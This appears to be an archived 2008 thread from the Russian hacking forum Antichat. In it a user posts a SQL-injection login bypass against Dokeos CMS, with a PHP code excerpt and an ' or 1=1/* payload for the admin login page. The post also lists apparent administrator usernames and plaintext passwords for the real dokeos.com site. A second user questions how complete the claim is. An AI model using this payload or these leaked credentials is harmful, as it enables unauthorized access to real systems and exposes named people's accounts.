ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Dokeos CMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Dokeos CMS
  #1  
Старый 04.07.2008, 18:33
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию Dokeos CMS
Dokeos CMS

Warning: magic_quotes_gpc = off
--------------------------------------
Site: dokeos.com [PR=6]
Status: Free
--------------------------------------
Vuln:
/claro_init_local.inc.php
PHP код:
 ............
   if(isset($_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in
    {
        $login $_POST['login'];
        $password $_POST['password'];
 ............. 
--------------------------------------
Exploit:
/admin/login.php
PHP код:
Your login 1' or 1=1/*    
 Your password : x3kpass 
--------------------------------------
Super Administrators:
Код:
yannick:adminPassword
 thomas:upsi24lon
 jwarnier:cisco123
ZAMUT (c)
__________________
в строю
Последний раз редактировалось ZAMUT; 04.07.2008 в 18:38..
 
Ответить с цитированием

  #2  
Старый 04.07.2008, 19:11
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию
Подверженная версия, дорк и уязвимый запрос пожалста (ты указал только объявление переменных, но не показал где и как они попадают в запрос).
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Kasseler CMS 1.0.0 Lite vadim399 PHP, PERL, MySQL, JavaScript 1 31.12.2007 03:30
Faq по проектированию Cms k00p3r Обсуждение Ваших сайтов 0 09.08.2005 09:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ